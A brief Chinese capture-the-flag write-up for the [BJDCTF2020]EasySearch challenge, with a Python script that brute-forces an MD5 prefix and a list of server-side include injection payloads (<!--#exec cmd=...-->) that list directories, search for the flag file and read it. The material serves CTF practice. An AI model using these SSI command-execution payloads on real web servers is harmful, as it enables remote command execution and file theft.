[BJDCTF2020]EasySearch

import random
import hashlib

for passwd in range(1,10**7):
	passwd = str(passwd)
	now = hashlib.md5(passwd.encode('utf-8')).hexdigest()
	#print(now[:6])
	if(now[:6] =="6d0bc1"):
		print(passwd)
		break

ssi漏洞

https://blog.csdn.net/qq_40657585/article/details/84260844

扫描当前目录

<!--#exec cmd="ls"-->

查看当前目录

<!--#exec cmd="pwd"-->

如果文件名叫flag***那么可以找文件

<!--#exec cmd="find / -type f -name flag*"-->

cat flag

<!--#exec cmd="cat /var/www/html/flag_990c66bf85a09c664f0b6741840499b2"-->

或者,但是这个没有测试出来的亚子

<!--#exec cmd="find / -type f | xargs grep flag{"-->

查看全文

相关阅读:
nodejs入门学习笔记一——一个完整的http路由服务实现
 安装centos虚拟机
 test
sql单列合并
 linux系统的安全小知识
 建造者模式组装mybatis参数Example（）
Https网站搭建——通过https://localhost:8443访问tomcat首页
 妈妈再也不用担心我找不到spring源码了！
Webpack --- 模块打包器
 CSS3弹性盒---怪异盒

原文地址：https://www.cnblogs.com/h3zh1/p/12891831.html